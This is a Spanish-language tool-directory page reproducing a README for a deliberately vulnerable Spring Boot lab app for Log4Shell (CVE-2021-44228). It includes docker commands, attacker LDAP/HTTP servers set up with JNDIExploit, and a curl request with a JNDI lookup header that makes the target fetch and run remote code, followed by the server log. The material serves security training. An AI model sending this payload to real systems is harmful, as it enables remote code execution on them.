Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
log4shell-vulnerable-app — Este repositorio contiene una aplicación web Spring Boot vulnerable a CVE-2021-44228, conocida como log4shell. | Kitploit
Herramientas/GitHubGitHub/romanutti/log4shell-vulnerable-app
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubromanutti/log4shell-vulnerable-app

log4shell-vulnerable-app

Este repositorio contiene una aplicación web Spring Boot vulnerable a CVE-2021-44228, conocida como log4shell.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 4 añosAún no revisado

Aplicación vulnerable

Este repositorio contiene una aplicación web Spring Boot vulnerable a CVE-2021-44228, conocida como log4shell.

Usa

  • log-4j-core:2.14.1 (a través de spring-boot-starter-log4j2) y
  • openjdk:8u181

Ejecutando la aplicación

Ejecútalo:

root@kitploit:~
docker run --name vulnerable-app --rm -p 8080:8080 romanutti/log4shell-vulnerable-app

O alternativamente, constrúyelo tú mismo:

root@kitploit:~
docker build . -t vulnerable-app
docker run -p 8080:8080 --name vulnerable-app --rm vulnerable-app

Manual de explotación

Usando los siguientes pasos puedes reproducir un exploit de log4shell. Si no estás familiarizado con cómo funciona el ataque internamente, consulta este artículo o las diapositivas en este repositorio.

Actualización (13 de diciembre): El repositorio JNDIExploit ha sido eliminado de GitHub (presumiblemente, no por GitHub). Por lo tanto, te recomiendo que uses la versión guardada de este repositorio.

Configurar servidores atacantes

Primero tenemos que configurar los servidores atacantes. Esto consiste en

  • un servidor LDAP que nos redirigirá a nuestro servidor HTTP malicioso
  • un servidor HTTP que devolverá la carga útil dañina

Usamos JNDIExploit para levantar los servidores atacantes.

root@kitploit:~
git clone https://github.com/romanutti/log4shell-vulnerable-app.git
cd log4shell-vulnerable-app/src/main/resources
unzip JNDIExploit.v1.2.zip
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i [your-private-ip] -p 8888

Desencadenando el exploit

Como carga útil queremos ejecutar touch /tmp/pwned (que corresponde al codificado en base64 dG91Y2ggL3RtcC9wd25lZAo=) en el servidor de la aplicación vulnerable.

Desencadena el exploit usando:

root@kitploit:~
# will execute 'touch /tmp/pwned'
curl localhost:8080 -H 'user: ${jndi:ldap://[your-private-ip]:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'

La salida de JNDIExploit muestra que los servidores atacantes respondieron con el exploit malicioso y ejecutaron la carga útil:

root@kitploit:~
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8888...
[+] Received LDAP Query: Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo
[+] Paylaod: command
[+] Command: touch /tmp/pwned

[+] Sending LDAP ResourceRef result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo with basic remote reference payload
[+] Send LDAP reference result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo redirecting to http://[your-private-ip]:8888/Exploitjkk87OnvOH.class
[+] New HTTP Request From /[your-private-ip]:50119  /Exploitjkk87OnvOH.class
[+] Receive ClassRequest: Exploitjkk87OnvOH.class
[+] Response Code: 200

Para confirmar que la ejecución del código fue exitosa, verificamos que el archivo /tmp/pwned.txt se haya creado en el contenedor que ejecuta la aplicación vulnerable:

root@kitploit:~
$ docker exec vulnerable-app ls /tmp

...
pwned
...

Referencia

https://www.lunasec.io/docs/blog/log4j-zero-day/
https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/
https://github.com/christophetd/log4shell-vulnerable-app/

Descargar herramienta